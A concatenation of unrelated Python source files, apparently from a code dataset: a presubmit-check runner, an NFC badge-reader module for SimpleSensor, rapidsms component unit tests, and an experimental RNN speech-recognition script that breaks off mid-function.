function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
try:
context['__args'] = (input_api, output_api)
logging.debug('Running %s in %s', function_name, presubmit_path)
result = eval(function_name + '(*__args)', context)
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
map(os.remove, input_api._named_temporary_files)
if not (isinstance(result, types.TupleType) or
isinstance(result, types.ListType)):
raise PresubmitFailure(
'Presubmit functions must return a tuple or list')
for item in result:
if not isinstance(item, OutputApi.PresubmitResult):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
else:
result = () # no error since the script doesn't care about current event.
# Return the process to the original working directory.
os.chdir(main_path)
return result
def DoPresubmitChecks(change,
committing,
verbose,
output_stream,
input_stream,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
output_stream: A stream to write output from presubmit tests to.
input_stream: A stream to read input from the user.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
Warning:
If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream
SHOULD be sys.stdin.
Return:
A PresubmitOutput object. Use output.should_continue() to figure out
if there were errors or warnings and the caller should abort.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
output = PresubmitOutput(input_stream, output_stream)
if committing:
output.write("Running presubmit commit checks ...\n")
else:
output.write("Running presubmit upload checks ...\n")
start_time = time.time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
output.write("Warning, no PRESUBMIT.py found.\n")
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel)
if default_presubmit:
if verbose:
output.write("Running default presubmit script.\n")
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
output.more_cc.extend(executer.more_cc)
errors = []
notifications = []
warnings = []
for result in results:
if result.fatal:
errors.append(result)
elif result.should_prompt:
warnings.append(result)
else:
notifications.append(result)
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format() for error in errors
],
'notifications': [
notification.json_format() for notification in notifications
],
'warnings': [
warning.json_format() for warning in warnings
]
}
gclient_utils.FileWrite(json_output, json.dumps(presubmit_results))
output.write('\n')
for name, items in (('Messages', notifications),
('Warnings', warnings),
('ERRORS', errors)):
if items:
output.write('** Presubmit %s **\n' % name)
for item in items:
item.handle(output)
output.write('\n')
total_time = time.time() - start_time
if total_time > 1.0:
output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time)
if errors:
output.fail()
elif warnings:
output.write('There were presubmit warnings. ')
if may_prompt:
output.prompt_yes_no('Are you sure you wish to continue? (y/N): ')
else:
output.write('Presubmit checks passed.\n')
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
output.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return output
finally:
os.environ = old_environ
def ScanSubDirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def ParseFiles(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in ScanSubDirs(arg, recursive)])
return files
def load_files(options, args):
"""Tries to determine the SCM."""
files = []
if args:
files = ParseFiles(args, options.recursive)
change_scm = scm.determine_scm(options.root)
if change_scm == 'git':
change_class = GitChange
upstream = options.upstream or None
if not files:
files = scm.GIT.CaptureStatus([], options.root, upstream)
else:
logging.info('Doesn\'t seem under source control. Got %d files', len(args))
if not files:
return None, None
change_class = Change
return change_class, files
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warn('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.iteritems():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = optparse.OptionParser(usage="%prog [options] <files...>",
version="%prog " + str(__version__))
parser.add_option("-c", "--commit", action="store_true", default=False,
help="Use commit instead of upload checks")
parser.add_option("-u", "--upload", action="store_false", dest='commit',
help="Use upload instead of commit checks")
parser.add_option("-r", "--recursive", action="store_true",
help="Act recursively")
parser.add_option("-v", "--verbose", action="count", default=0,
help="Use 2 times for more debug info")
parser.add_option("--name", default='no name')
parser.add_option("--author")
parser.add_option("--description", default='')
parser.add_option("--issue", type='int', default=0)
parser.add_option("--patchset", type='int', default=0)
parser.add_option("--root", default=os.getcwd(),
help="Search for PRESUBMIT.py up to this directory. "
"If inherit-review-settings-ok is present in this "
"directory, parent directories up to the root file "
"system directories will also be searched.")
parser.add_option("--upstream",
help="Git only: the base ref or upstream branch against "
"which the diff should be computed.")
parser.add_option("--default_presubmit")
parser.add_option("--may_prompt", action='store_true', default=False)
parser.add_option("--skip_canned", action='append', default=[],
help="A list of checks to skip which appear in "
"presubmit_canned_checks. Can be provided multiple times "
"to skip multiple canned checks.")
parser.add_option("--dry_run", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_fetch", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in all '
'PRESUBMIT files in parallel.')
parser.add_option('--json_output',
help='Write presubmit errors to json output.')
options, args = parser.parse_args(argv)
if options.verbose >= 2:
logging.basicConfig(level=logging.DEBUG)
elif options.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.ERROR)
change_class, files = load_files(options, args)
if not change_class:
parser.error('For unversioned directory, <files> is not optional.')
logging.info('Found %d file(s).', len(files))
gerrit_obj = None
if options.gerrit_url and options.gerrit_fetch:
assert options.issue and options.patchset
gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc)
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(options.issue,
options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
try:
with canned_check_filter(options.skip_canned):
results = DoPresubmitChecks(
change_class(options.name,
options.description,
options.root,
files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream),
options.commit,
options.verbose,
sys.stdout,
sys.stdin,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output)
return not results.should_continue()
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
collectionModule.py
|
"""
Sample structure for a collection point module.
This module describes the basic uses of SimpleSensor.
To make your own module, this is a good place to start.
"""
from simplesensor.collection_modules.nfc_bcard_reader import moduleConfigLoader as configLoader
from simplesensor.shared import Message, ThreadsafeLogger, ModuleProcess
from multiprocessing import Process
from threading import Thread
import time
import json
import struct
import datetime
from smartcard.scard import *
import smartcard.util
_HEADER_SIZE = 6
class CollectionModule(ModuleProcess):
# You can keep these parameters the same, all modules receive the same params
# self - reference to self
# baseConfig - configuration settings defined in /simplesensor/config/base.conf
# (https://github.com/AdobeAtAdobe/SimpleSensor/blob/master/config/base.conf)
# pInBoundQueue - messages from handler to this module
# pOutBoundQueue - messages from this module to other modules
# loggingQueue - logging messages for threadsafe logger
def __init__(self, baseConfig, pInBoundQueue, pOutBoundQueue, loggingQueue):
"""
Initialize new CollectionModule instance.
"""
super(CollectionModule, self).__init__(baseConfig, pInBoundQueue, pOutBoundQueue, loggingQueue)
# Most collection modules will follow a similar pattern...
# 1. Set up some variables on the self object
# Queues
self.outQueue = pOutBoundQueue
self.inQueue= pInBoundQueue
self.loggingQueue = loggingQueue
self.threadProcessQueue = None
self.alive = False
self.context = None
self.reader = None
# 2. Load the module's configuration file
# Configs
self.moduleConfig = configLoader.load(self.loggingQueue, __name__)
self.config = baseConfig
# 3. Set some constants to the self object from config parameters (if you want)
self._id = self.moduleConfig['CollectionPointId']
self._type = self.moduleConfig['CollectionPointType']
self._port = self.moduleConfig['ReaderPortNumber']
# 4. Create a threadsafe logger object
self.logger = ThreadsafeLogger(loggingQueue, __name__)
def run(self):
"""
Main process method, run when the thread's start() function is called.
Starts monitoring inbound messages to this module, and collection logic goes here.
For example, you could put a loop with a small delay to keep polling the sensor, etc.
When something is detected that's relevant, put a message on the outbound queue.
"""
# Monitor inbound queue on own thread
self.listen()
self.alive = True
while self.context == None:
self.establish_context()
while self.alive:
while self.reader == None:
self.reader = self.get_reader()
if self.reader is None:
self.logger.info('Waiting for 5 seconds before '
+ 'trying to find readers again. Is it plugged in?')
time.sleep(5)
# connect to card
card = self.get_card()
if card is None:
continue
# get block #10 and 11 of card,
# contains the attendee ID
msg = [0xFF, 0xB0, 0x00, bytes([10])[0], 0x04]
chunk_one = self.send_transmission(card, msg)
if chunk_one is None:
self.reader = None
continue
msg = [0xFF, 0xB0, 0x00, bytes([11])[0], 0x04]
chunk_two = self.send_transmission(card, msg)
if chunk_two is None:
self.reader = None
continue
# the id is in B1-3 of block 10
# and B0-2 of block 11
attendee_id_bytes = bytearray(chunk_one[1:4]+chunk_two[0:3])
attendee_id = attendee_id_bytes.decode('UTF-8')
xdata = {
'attendee_id': attendee_id
}
msg = self.build_message(topic='scan_in', extendedData=xdata)
self.logger.info('Sending message: {}'.format(msg))
self.put_message(msg)
self.reader = None
# sleep for a bit to avoid double scanning
time.sleep(5)
def establish_context(self):
hresult, hcontext = SCardEstablishContext(SCARD_SCOPE_USER)
if hresult != SCARD_S_SUCCESS:
self.logger.error(
'Unable to establish context: {}'.format(
SCardGetErrorMessage(hresult)))
return
self.context = hcontext
def get_reader(self):
hresult, readers = SCardListReaders(self.context, [])
if hresult != SCARD_S_SUCCESS:
self.logger.error(
'Failed to list readers: {}'.format(
SCardGetErrorMessage(hresult)))
return
if len(readers)<1 or len(readers)-1<self._port:
self.logger.error(
'Not enough readers attached. {} needed, {} attached'.format(
(self._port+1), (len(readers))))
return
else:
return readers[self._port]
def get_card(self, mode=None, protocol=None):
hresult, hcard, dwActiveProtocol = SCardConnect(
self.context,
self.reader,
mode or SCARD_SHARE_SHARED,
protocol or (SCARD_PROTOCOL_T0 | SCARD_PROTOCOL_T1))
if hresult != SCARD_S_SUCCESS:
return
else:
return hcard
def send_transmission(self, card, msg, protocol=None):
hresult, response = SCardTransmit(
card,
protocol or SCARD_PCI_T1,
msg)
if hresult != SCARD_S_SUCCESS:
self.logger.error(
'Failed to send transmission: {}'.format(
SCardGetErrorMessage(hresult)))
return
else:
return response[:-2]
def listen(self):
"""
Start thread to monitor inbound messages, declare module alive.
"""
self.threadProcessQueue = Thread(target=self.process_queue)
self.threadProcessQueue.setDaemon(True)
self.threadProcessQueue.start()
def build_message(self, topic, extendedData={}, recipients=['communication_modules']):
"""
Create a Message instance.
topic (required): message type
sender_id (required): id property of original sender
sender_type (optional): type of sender, ie. collection point type, module name, hostname, etc
extended_data (optional): payload to deliver to recipient(s)
recipients (optional): module name, which module(s) the message will be delivered to, ie. `websocket_server`.
use an array of strings to define multiple modules to send to.
use 'all' to send to all available modules.
use 'local_only' to send only to modules with `low_cost` prop set to True.
[DEFAULT] use 'communication_modules' to send only to communication modules.
use 'collection_modules' to send only to collection modules.
"""
msg = Message(
topic=topic,
sender_id=self._id,
sender_type=self._type,
extended_data=extendedData,
recipients=recipients,
timestamp=datetime.datetime.utcnow())
return msg
def put_message(self, msg):
"""
Put message onto outgoing queue.
"""
self.outQueue.put(msg)
def process_queue(self):
"""
Process inbound messages on separate thread.
When a message is encountered, trigger an event to handle it.
Sleep for some small amount of time to avoid overloading.
Also receives a SHUTDOWN message from the main process when
the user presses the esc key.
"""
self.logger.info("Starting to watch collection point inbound message queue")
while self.alive:
if (self.inQueue.empty() == False):
self.logger.info("Queue size is %s" % self.inQueue.qsize())
try:
message = self.inQueue.get(block=False,timeout=1)
if message is not None:
self.handle_message(message)
except Exception as e:
self.logger.error("Error, unable to read queue: %s " %e)
self.shutdown()
self.logger.info("Queue size is %s after" % self.inQueue.qsize())
else:
time.sleep(.25)
def handle_message(self, message):
"""
Handle messages from other modules to this one.
Switch on the message topic, do something with the data fields.
"""
if message.topic.upper()=='SHUTDOWN' and message.sender_id=='main':
self.shutdown()
def shutdown(self):
"""
Shutdown the collection module.
Set alive flag to false so it stops looping.
Wait for things to die, then exit.
"""
self.alive = False
print("Shutting down nfc_bcard_reader")
time.sleep(1)
self.exit = True
|
test_component.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import unittest
from rapidsms.component import Component, Receiver
import threading, time
class TestComponent(unittest.TestCase):
def test_router (self):
c = Component()
self.assertEquals(c.router, None, "no router set yet")
c._router = "(router)"
self.assertEquals(c.router, "(router)", "router can be set")
def test_title(self):
c = Component()
self.assertEquals(c.title, "component", "Component.title has a default")
c._title = "TestComponent"
self.assertEquals(c.title, "TestComponent", "Component.title can be set")
def test_config_requires(self):
c = Component()
self.assertEquals(c.config_requires("example", "hello"), "hello",
"config_requires returns value if not None")
self.assertRaises(Exception, c.config_requires, "example", None,
"config_requires raises an Exception if value is None")
def test_config_bool (self):
c = Component()
self.assertTrue(c.config_bool("true"), "config_bool accepts true")
self.assertTrue(c.config_bool("True"), "config_bool accepts True")
self.assertTrue(c.config_bool("yes"), "config_bool accepts yes")
self.assertTrue(c.config_bool("YES"), "config_bool accepts YES")
self.assertFalse(c.config_bool("false"), "config_bool accepts false")
self.assertFalse(c.config_bool("no"), "config_bool accepts no")
def test_config_list (self):
c = Component()
self.assertEquals(c.config_list("a,b,c"),["a","b","c"], "config_list parses str")
self.assertEquals(c.config_list(["a","b"]),["a","b"], "config_list copies list")
self.assertEquals(c.config_list("a"),["a"], "config_list creates len-1 list")
def test__logging_method(self):
self.assertTrue(callable(Component.debug), "Component has debug log method")
self.assertTrue(callable(Component.info), "Component has info log method")
self.assertTrue(callable(Component.warning), "Component has warning log method")
self.assertTrue(callable(Component.error), "Component has error log method")
self.assertTrue(callable(Component.critical), "Component has critical log method")
class TestReceiver(unittest.TestCase):
def test_message_waiting(self):
r = Receiver()
r.send("message 1")
self.assertEquals(r.message_waiting, 1, "1 message is waiting")
def test_next_message (self):
r = Receiver()
self.assertEquals(r.next_message(), None, "no message waiting")
r.send("message 2")
self.assertEquals(r.next_message(), "message 2", "got a message")
self.assertEquals(r.next_message(), None, "message was removed")
def send_a_message_later (secs):
time.sleep(secs)
r.send("message 3")
thread = threading.Thread(target=send_a_message_later, args=(0.5,))
thread.start()
self.assertEquals(r.next_message(5.0), "message 3", "block and wait")
thread = threading.Thread(target=send_a_message_later, args=(5.0,))
thread.start()
self.assertEquals(r.next_message(0.5), None, "next_msg doesn't block too long")
if __name__ == "__main__":
unittest.main()
|
experimental.py
|
from __future__ import absolute_import, print_function
import audioop # Operates on sound fragments consisting of signed integer samples 8, 16 or 32 bits wide, stored in Python strings.
import datetime # Supplies classes for manipulating dates and times in both simple and complex ways
import multiprocessing # A package that supports spawning processes using an API similar to the threading module.
import os # The path module suitable for the operating system Python is running on, and therefore usable for local paths
# import peakutils.peak # Peak detection utilities for 1D data
import random # Pseudo-random number generators for various distributions
import time # Provides various time-related functions.
import Tkinter # Python's de-facto standard GUI (Graphical User Interface) package
import wave # Provides a convenient interface to the WAV sound format
import matplotlib.pyplot as plt # Simple graph plotting library
import numpy # The fundamental package for scientific computing with Python.
import pyaudio # Provides Python bindings for PortAudio, the cross platform audio API
import pyqtgraph as pg # A pure-python graphics and GUI library built on PyQt4 / PySide and numpy
from PyQt4 import QtCore # A comprehensive set of Python bindings for Digia's Qt cross platform GUI toolkit.
from .nnet import RNN # Import the Recurrent Neural Network class from Dragonfire's Neural Network Library
__author__ = 'Mehmet Mert Yildiran, mert.yildiran@bil.omu.edu.tr'
# This submodule is experimental and not functional
CHUNK = 1024 # Smallest unit of audio. 1024 bytes
FORMAT = pyaudio.paInt16 # Data format
CHANNELS = 2 # Number of channels
RATE = 44100 # Bit Rate of audio stream / Frame Rate
THRESHOLD = 1000 # Threshhold value for detecting stimulant
SILENCE_DETECTION = 5 # Wait number of frames to decide whether it fell silent or not
EMPTY_CHUNK = chr(int('000000', 2)) * CHUNK * 4 # Create an empty unit of audio for just once
WAVE_OUTPUT_FILENAME = "/tmp/" + str(datetime.date.today()) + ".wav" # Example path if saving needed
TRAINING_DATA_DIRECTORY = "training_data/"
PLOTS_DIRECTORY = "plots/" # Directory to save the plots
OUT_DIRECTORY = "out/" # Output directory for training results (model.npz & words.txt)
root = Tkinter.Tk()
SCREEN_WIDTH = root.winfo_screenwidth()
SCREEN_HEIGHT = root.winfo_screenheight()
HIDDEN_NEURON = 20 # Hidden neuron count in the network
REPEAT_N_TIMES = 10 # How many times repeated? For 3 for example; one, one, one, two, two, two, three, ...
TRAINING_ITERATION = 1000 # How many iterations for training
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
class SpeechRecognition():
# A function that will save recordings to a file
@staticmethod
def save_file(frames):
p = pyaudio.PyAudio() # Create a PyAudio session
if not os.path.isfile(WAVE_OUTPUT_FILENAME): # If there is not such a file
wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb') # Create the file
wf.setnchannels(CHANNELS) # Set number of channels
wf.setsampwidth(p.get_sample_size(FORMAT)) # Set sampling format
wf.setframerate(RATE) # Set Bit Rate / Frame Rate
wf.writeframes("") # Write nothing
wf.close() # Close the session
wf = wave.open(WAVE_OUTPUT_FILENAME, 'rb') # Open the file with only read permission
n_frames = wf.getnframes() # Get all frames in it
previous_wav = wf.readframes(n_frames) # Assign all frames to a variable
wf.close() # Close the session
wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb') # Open the file with write permission
wf.setnchannels(CHANNELS) # Set number of channels
wf.setsampwidth(p.get_sample_size(FORMAT)) # Set sampling format
wf.setframerate(RATE) # Set Bit Rate / Frame Rate
wf.writeframes(previous_wav + b''.join(frames)) # Write the all frames including previous ones
wf.close() # Close the session
@staticmethod
def save_training_data(training_data,words):
file_id = str(random.randint(100000,999999)) # Random file ID
if not os.path.exists(TRAINING_DATA_DIRECTORY): # Check whether the directory is exist or not
os.makedirs(TRAINING_DATA_DIRECTORY) # If there is none then create one
p = pyaudio.PyAudio() # Create a PyAudio session
wf = wave.open(TRAINING_DATA_DIRECTORY + file_id + ".wav", 'wb') # Create the .wav file with a random name
wf.setnchannels(CHANNELS) # Set number of channels
wf.setsampwidth(p.get_sample_size(FORMAT)) # Set sampling format
wf.setframerate(RATE) # Set Bit Rate / Frame Rate
wf.writeframes(''.join(training_data)) # Write the all frames of training_data
wf.close() # Close the session
with open(TRAINING_DATA_DIRECTORY + file_id + ".txt", "w") as thefile:
for word in words:
thefile.write("%s\n" % word)
# A function that will compute frequency of chunk using Fourier Transform
@staticmethod
def find_frequency(data):
T = 1.0/RATE # Reciprocal of Bit Rate
N = data.shape[0] # Number of rows in data(numpy array)
Pxx = (1./N)*numpy.fft.fft(data) # Compute the one-dimensional n-point discrete Fourier Transform (DFT) of data with the efficient Fast Fourier Transform (FFT) algorithm [CT]
f = numpy.fft.fftfreq(N,T) # Return the Discrete Fourier Transform sample frequencies
Pxx = numpy.fft.fftshift(Pxx) # Shift the zero-frequency component to the center of the spectrum
f = numpy.fft.fftshift(f) # Shift the zero-frequency component to the center of the spectrum
return f, Pxx # Return the results
# A function that will draw a spectrum analyzer graphic to screen (PyQtGraph)
@staticmethod
def draw_spectrum_analyzer(all_frames, thresh_frames):
time.sleep(1) # Wait just one second
pw = pg.plot(title="Spectrum Analyzer") # Window title
pg.setConfigOptions(antialias=True) # Enable antialias for better resolution
pw.win.resize(1600, 300) # Define window size
pw.win.move(160 * SCREEN_WIDTH / 1920, 500 * SCREEN_HEIGHT / 1080) # Define window position
while True: # Loop over the frames of the audio / data chunks
data = ''.join(all_frames[-1:]) # Get only the last frame of all frames
data = numpy.fromstring(data, 'int16') # Binary string to numpy int16 data format
pw.setMouseEnabled(y=False) # Disable mouse
pw.setYRange(0,1000) # Set Y range of graph
pw.setXRange(-(RATE/2), (RATE/2), padding=0) # Set X range of graph relative to Bit Rate
pwAxis = pw.getAxis("bottom") # Get bottom axis
pwAxis.setLabel("Frequency [Hz]") # Set bottom axis label
f, Pxx = SpeechRecognition.find_frequency(data) # Call find frequency function. f is frequency, Pxx is energy.
Pxx = numpy.absolute(Pxx) # Calculate the absolute value element-wise. (complex input a + ib to sqrt(a^2 + b^2))
#peak_indexes = peakutils.peak.indexes(Pxx, thres=50.0/max(Pxx), min_dist=5) # Find the peaks. thres (energy threshold) is a rational value in here like 10/2000 on y-axis. min_dist is the minimum distance criteria for the peaks on x-axis.
#peak_indexes = peak_indexes.tolist() # Numpy array to list
#peak_values = list(Pxx[peak_indexes]) # Automatically map into list using peak indexes
#peak_indexes = list(f[peak_indexes]) # Automatically map into list using peak indexes
f = f.tolist() # Numpy array to list
Pxx = Pxx.tolist() # Numpy array to list
try: # Try this block
if thresh_frames[-1:][0] == EMPTY_CHUNK: # If last thresh frame is equal to EMPTY CHUNK
pw.plot(x=f,y=Pxx, clear=True, pen=pg.mkPen('w', width=1.0, style=QtCore.Qt.SolidLine)) # Then plot with white pen
else: # If last thresh frame is not equal to EMPTY CHUNK
pw.plot(x=f,y=Pxx, clear=True, pen=pg.mkPen('y', width=1.0, style=QtCore.Qt.SolidLine)) # Then plot with yellow pen
#pw.plot(x=peak_indexes, y=peak_values, pen=None, symbol='t') # Draw a scatter plot to the peak points
#pw.plot(x=peak_indexes, y=peak_values, pen=pg.mkPen('b', width=0.5, style=QtCore.Qt.SolidLine)) # Draw faint lines between the peak poits
except IndexError: # If we are getting an IndexError because of this -> thresh_frames[-1:][0]
pw.plot(x=f,y=Pxx, clear=True, pen=pg.mkPen('w', width=1.0, style=QtCore.Qt.SolidLine)) # Then plot with white pen
pg.QtGui.QApplication.processEvents() # ???
time.sleep(0.03) # Wait a few miliseconds
# A function that will draw a waveform graphic to screen (PyQtGraph)
@staticmethod
def draw_waveform(all_frames, thresh_frames):
time.sleep(1) # Wait just one second
pw = pg.plot(title="Waveform") # Window title
pg.setConfigOptions(antialias=True) # Enable antialias for better resolution
pw.win.resize(1300, 160) # Define window size
pw.win.move(300 * SCREEN_WIDTH / 1920, 850 * SCREEN_HEIGHT / 1080) # Define window position
pw.showAxis('bottom', False) # Hide bottom axis
while True: # Loop over the frames of the audio / data chunks
data = ''.join(all_frames[-20:]) # Join last 20 frames of all frames
data = numpy.fromstring(data, 'int16') # Binary string to numpy int16 data format
data2 = ''.join(thresh_frames[-20:]) # Join last 20 frames of thrsh frames
data2 = numpy.fromstring(data2, 'int16') # Binary string to numpy int16 data format
pw.setMouseEnabled(x=False) # Disable mouse
pw.setRange(yRange=[-10000,10000]) # Set Y range of graph
pw.plot(data, clear=True, pen=pg.mkPen('w', width=0.5, style=QtCore.Qt.DotLine)) # Plot all frames with white pen
pw.plot(data2, pen=pg.mkPen('y', width=0.5, style=QtCore.Qt.DotLine)) # Plot thresh frames with yellow pen
text = pg.TextItem("Seconds : " + str(int(len(all_frames)/(RATE/CHUNK))), color=(255, 255, 255)) # Define seconds according to number of total frames as a text
pw.addItem(text) # Display seconds according to number of total frames
text.setPos(500, 0) # Set text position
pg.QtGui.QApplication.processEvents()
time.sleep(0.03) # Wait a few miliseconds
# MAIN CODE BLOCK
@staticmethod
def start(audio_input,graphs=True,verbose=True):
words = []
txt_path = os.path.join(OUT_DIRECTORY, "words.txt")
with open(txt_path) as f:
words = words + [x.strip() for x in f.readlines()] # Load words from words.txt into an array
rnn = RNN(CHUNK*2, HIDDEN_NEURON, len(words)) # Create a Recurrent Neural Network instance (input,hidden,output)
rnn.importdump(OUT_DIRECTORY + "model.npz") # Import the dump
if audio_input == "0":
pass
else:
wf = wave.open(audio_input, 'rb') # Open .wav file from given path as audio_input in arguments
p = pyaudio.PyAudio() # Create a PyAudio session
# Create a stream
if audio_input == "0":
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
else:
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
all_frames = []
thresh_frames = []
if graphs:
shared_memory = multiprocessing.Manager() # Shared memory space manager
all_frames = shared_memory.list() # Define all_frames array in shared memory
thresh_frames = shared_memory.list() # Define thresh_frames array in shared memory
if audio_input == "0":
data = stream.read(CHUNK) # Get first data frame from the microphone
else:
data = wf.readframes(CHUNK) # Get first data frame from .wav file
all_frames.append(data) # Append to all frames
thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY CHUNK to thresh frames
if graphs:
process1 = multiprocessing.Process(target=SpeechRecognition.draw_waveform, args=(all_frames, thresh_frames)) # Define draw waveform process
process1.start() # Start draw waveform process
process2 = multiprocessing.Process(target=SpeechRecognition.draw_spectrum_analyzer, args=(all_frames, thresh_frames)) # Define draw spectrum analyzer process
process2.start() # Start drar spectrum analyzer process
# Loop over the frames of the audio / data chunks
while data != '':
previous_data = data # Get previous chunk that coming from end of the loop
if audio_input == "0":
data = stream.read(CHUNK) # Read a new chunk from the stream
else:
if graphs:
stream.write(data) # Monitor current chunk
data = wf.readframes(CHUNK) # Read a new chunk from the stream
all_frames.append(data) # Append this chunk to all frames
thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY CHUNK to thresh frames
rms = audioop.rms(data, 2) # Calculate Root Mean Square of current chunk
word_data = [] # Define single word data
if rms >= THRESHOLD: # If Root Mean Square value is greater than THRESHOLD constant
#starting_time = datetime.datetime.now() # Starting time of the word
thresh_frames.pop() # Pop out last frame of thresh frames
thresh_frames.pop() # Pop out last frame of thresh frames
word_data.append(previous_data) # Append previous chunk to training data
word_data.append(data) # Append current chunk to training data
thresh_frames.append(previous_data) # Append previous chunk to thresh frames
thresh_frames.append(data) # Append current chunk to thresh frames
silence_counter = 0 # Define silence counter
while silence_counter < SILENCE_DETECTION: # While silence counter value less than SILENCE_DETECTION constant
if audio_input == "0":
data = stream.read(CHUNK) # Read a new chunk from the stream
else:
if graphs:
stream.write(data) # Monitor current chunk
data = wf.readframes(CHUNK) # Read a new chunk from the stream
all_frames.append(data) # Append this chunk to all frames
word_data.append(data) # Append this chunk to training data
thresh_frames.append(data) # Append this chunk to thresh frames
rms = audioop.rms(data, 2) # Calculate Root Mean Square of current chunk again
if rms < THRESHOLD: # If Root Mean Square value is less than THRESHOLD constant
silence_counter += 1 # Then increase silence counter
else: # Else
silence_counter = 0 # Assign zero value to silence counter
#del word_data[-(SILENCE_DETECTION-2):] # Delete last frames of training data as much as SILENCE_DETECTION constant
#del thresh_frames[-(SILENCE_DETECTION-2):] # Delete last frames of thresh frames as much as SILENCE_DETECTION constant
#for i in range(SILENCE_DETECTION-2): # SILENCE_DETECTION constant times
# thresh_frames.append(EMPTY_CHUNK) # Append an EMPTY_CHUNK
#ending_time = datetime.datetime.now() # Ending time of the training
for i in xrange(len(word_data)):
word_data[i] = numpy.fromstring(word_data[i], 'int16') # Convert each frame from binary string to int16
word_data = numpy.asarray(word_data) # Convert the word data into numpy array
word_data = word_data / word_data.max() # Normalize the input
output = rnn.run(word_data) # Run the network to get the output/result (feedforward)
print(words[numpy.argmax(output)] + '\t\t', output) # Print the best guess
if graphs:
process1.terminate() # Terminate draw waveform process
process2.terminate() # Terminate drar spectrum analyzer process
stream.stop_stream() # Stop the stream
stream.close() # Close the stream
p.terminate() # Terminate the session
@staticmethod
def _teststart():
rnn = RNN(2048, HIDDEN_NEURON, 5)
rnn.importdump("out/model.npz")
words_data = []
words = []
for filename in os.listdir(TRAINING_DATA_DIRECTORY):
if filename.endswith(".wav"):
wav_path = os.path.join(TRAINING_DATA_DIRECTORY, filename)
words_data = words_data + SpeechRecognition.extract_words_from_audio(wav_path)
txt_path = os.path.join(TRAINING_DATA_DIRECTORY, filename[:-4] + ".txt")
with open(txt_path) as f:
words = words + [x.strip() for x in f.readlines()]
for i in xrange(len(words_data)):
